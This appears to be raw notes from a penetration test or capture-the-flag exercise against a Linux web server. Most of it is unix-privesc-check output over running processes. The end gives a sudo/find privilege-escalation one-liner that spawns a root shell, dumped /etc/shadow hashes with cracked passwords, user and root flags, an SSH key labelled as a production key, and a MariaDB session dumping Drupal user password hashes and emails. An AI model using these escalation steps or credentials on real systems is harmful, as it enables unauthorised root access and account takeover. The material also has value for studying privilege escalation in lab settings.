PID: 525
Owner: root
Program path: /usr/libexec/switcheroo-control
Checking if anyone except root can change /usr/libexec/switcheroo-control
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 527
Owner: root
Program path: /lib/systemd/systemd-logind
Checking if anyone except root can change /lib/systemd/systemd-logind
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 528
Owner: root
Program path: /usr/lib/udisks2/udisksd
Checking if anyone except root can change /usr/lib/udisks2/udisksd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 530
Owner: root
Program path: /sbin/wpa_supplicant
Checking if anyone except root can change /sbin/wpa_supplicant
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 549
ERROR: Can't find full path of running program: avahi-daemon: chroot helper
Owner: avahi
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 598
Owner: root
Program path: /usr/sbin/ModemManager
Checking if anyone except root can change /usr/sbin/ModemManager
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 6
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 615
ERROR: Can't find full path of running program: php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 619
Owner: root
Program path: /snap/amazon-ssm-agent/5163/amazon-ssm-agent
Checking if anyone except root can change /snap/amazon-ssm-agent/5163/amazon-ssm-agent
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 625
Owner: root
Program path: /usr/bin/python3
Checking if anyone except root can change /usr/bin/python3
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 628
Owner: root
Program path: /usr/sbin/vsftpd
Checking if anyone except root can change /usr/sbin/vsftpd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 633
Owner: root
Program path: /usr/bin/containerd
Checking if anyone except root can change /usr/bin/containerd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 654
Owner: root
Program path: /usr/sbin/xrdp-sesman
Checking if anyone except root can change /usr/sbin/xrdp-sesman
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 714
Owner: xrdp
Program path: /usr/sbin/xrdp
Checking if anyone except xrdp can change /usr/sbin/xrdp
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 752
ERROR: Can't find full path of running program: php-fpm: pool www
Owner: www-data
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 753
ERROR: Can't find full path of running program: php-fpm: pool www
Owner: www-data
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 76556
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 77144
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 77145
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 77146
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 78
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 781
Owner: mysql
Program path: /usr/sbin/mysqld
Checking if anyone except mysql can change /usr/sbin/mysqld
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 79
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 798
Owner: root
Program path: /usr/sbin/nmbd
Checking if anyone except root can change /usr/sbin/nmbd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 80
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 81
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 813
Owner: root
Program path: /usr/sbin/cron
Checking if anyone except root can change /usr/sbin/cron
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 82
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 825
Owner: daemon
Program path: /usr/sbin/atd
Checking if anyone except daemon can change /usr/sbin/atd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 83
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 84
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 848
Owner: root
Program path: /sbin/agetty
Checking if anyone except root can change /sbin/agetty
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 85
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 86
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 865
Owner: root
Program path: /usr/bin/sddm
Checking if anyone except root can change /usr/bin/sddm
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 871
Owner: root
Program path: /usr/sbin/preload
Checking if anyone except root can change /usr/sbin/preload
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 88
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 9
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 90
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 92
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 93
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 95
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 96
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 97
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 98
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 99
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operatorRoot Access: Misconfigured SUDO Permissions
sudo install -m =xs $(which find) .
./find . -exec /bin/sh -p \\; -quitPersistence Service.
Hashes
root:$6$v8b2/P8T26uEUwvM$TBiao8o1dfqQrGPPcebRj6A6cNiixcy6/r/AFtN5Swk7N1kpg/8UyQK0pXFwdLfy5Ed/71VN91nJ6.3JyAN/00:18998:0:99999:7:::
auditor:$6$RNJCCrE9ok/yCMqD$7uPoYFsrnR3wPnSwPeLuBEiXgAzlOzGW6uZSyX.IjNNVcR5.bDBhb.dlZTN37JJR4yZXXQTetuUhOOX9ZNov6/:19099:0:99999:7:::
dbadmin:$6$1HAbXNNxXVVNCcoi$6Zy2gjvyZZYHTwSyxSLsdv0LA.5hA7EeD1WhUFzHg9SOSXrz7DxX7iG0mCQbmEBSo.yjB1c80iIujSM6Fjbpo/:19099:0:99999:7:::
Cracker Hashes
dbadmin:sayang
auditor:qwertyuiop
root:
Auditor User flag
fa8d826290d14821af415c3e1ce4412d
Root Flag
8e70e7b27a034b5a9e861fdb3169146a
authorisec_key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdIXSwB353GjkkZ6rWclir3qHwOx+P1A3Hcg+82IelP1KaS7rPQ7O4UCq4w5x7BJPEvCMulYKmpLeRR 18SQTxXUXHPJXHre9P3q9n9Y+MtR8ve6enu8Y1DuKHcAPcf3IKPINhVddCF8S/bPjsijjPqHeBxJQYsy1W3++6Ty1or8nNka7W/ErhnG55KWnIlwc9Zzz MkN+ozQyfHZ2td0b/b5CRF2j5N15K4dAaLzBs6t6vctm+mWxh0pIS6ztYDalsLtvZO2DsyGM4gHhRLxwT62z9sXZdAirs9FlrXZs5zramnfxo+G3fQ8ee Tt3eN1sFLMVcp+bMBaWfngX94KF/yNTt Production SSH Key - Linode
MariaBD
#
#
# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 351
Server version: 10.3.34-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| drupal |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)
MariaDB [(none)]> SELECT drupal;
ERROR 1054 (42S22): Unknown column 'drupal' in 'field list'
MariaDB [(none)]> use drupal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [drupal]> show tables;
+-----------------------------+
| Tables_in_drupal |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| comment |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| watchdog |
+-----------------------------+
73 rows in set (0.001 sec)
MariaDB [drupal]> SELECT * FROM USERS;
ERROR 1146 (42S02): Table 'drupal.USERS' doesn't exist
MariaDB [drupal]> SELECT * FROM users;
+-----+----------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+------------------+----------+---------+----------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+----------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+------------------+----------+---------+----------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$D67i0qFmSLMLwZ9PU7VEocSS9fvV1JaSeJxQMgCid80hGbq6wXZH | admin@syntex.com | | | NULL | 1650232322 | 1650248652 | 1650248498 | 1 | America/New_York | | 0 | admin@syntex.com | b:0; |
| 2 | auditor | $S$DV.wsqkmKY3y5VW.icW/g5NTU3h.UA01nxqL9Cro27GaSBYpH4WC | auditor@syntex.com | | | filtered_html | 1650234408 | 1693580087 | 1693580087 | 1 | America/New_York | | 0 | auditor@syntex.com | b:0; |
| 3 | dbadmin | $S$DZcGD5qcb6xso1E/Mu6DJP4uPi5DfY28kBEyuIab8Pod1saBaImN | dbadmin@syntex.com | | | filtered_html | 1650248436 | 1693580048 | 1693580048 | 1 | America/New_York | | 0 | dbadmin@syntex.com | b:0; |
| 4 | Vincenzo | $S$DGnS.dK3q2FeWeNbLikdI5Hk/XdBFI2jBFkmPvv/v9Ln8vjIanIu | vincenzo@syntext.com | | | filtered_html | 1650248490 | 0 | 0 | 1 | America/New_York | | 0 | vincenzo@syntext.com | b:0; |
+-----+----------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+------------------+----------+---------+----------------------+------+
+-----+----------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+------------------+----------+---------+----------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+----------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+------------------+----------+---------+----------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$D67i0qFmSLMLwZ9PU7VEocSS9fvV1JaSeJxQMgCid80hGbq6wXZH | admin@syntex.com | | | NULL | 1650232322 | 1650248652 | 1650248498 | 1 | America/New_York | | 0 | admin@syntex.com | b:0; |
| 2 | auditor | $S$DV.wsqkmKY3y5VW.icW/g5NTU3h.UA01nxqL9Cro27GaSBYpH4WC | auditor@syntex.com | | | filtered_html | 1650234408 | 0 | 0 | 1 | America/New_York | | 0 | auditor@syntex.com | b:0; |
| 3 | dbadmin | $S$DZcGD5qcb6xso1E/Mu6DJP4uPi5DfY28kBEyuIab8Pod1saBaImN | dbadmin@syntex.com | | | filtered_html | 1650248436 | 0 | 0 | 1 | America/New_York | | 0 | dbadmin@syntex.com | b:0; |
| 4 | Vincenzo | $S$DGnS.dK3q2FeWeNbLikdI5Hk/XdBFI2jBFkmPvv/v9Ln8vjIanIu | vincenzo@syntext.com | | | filtered_html | 1650248490 | 0 | 0 | 1 | America/New_York | | 0 | vincenzo@syntext.com | b:0; |
+-----+----------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+------------------+----------+---------+----------------------+------+
root:7C695400AEECFFAD9251CB1CF2DC6CE8A143FCE9
Last updated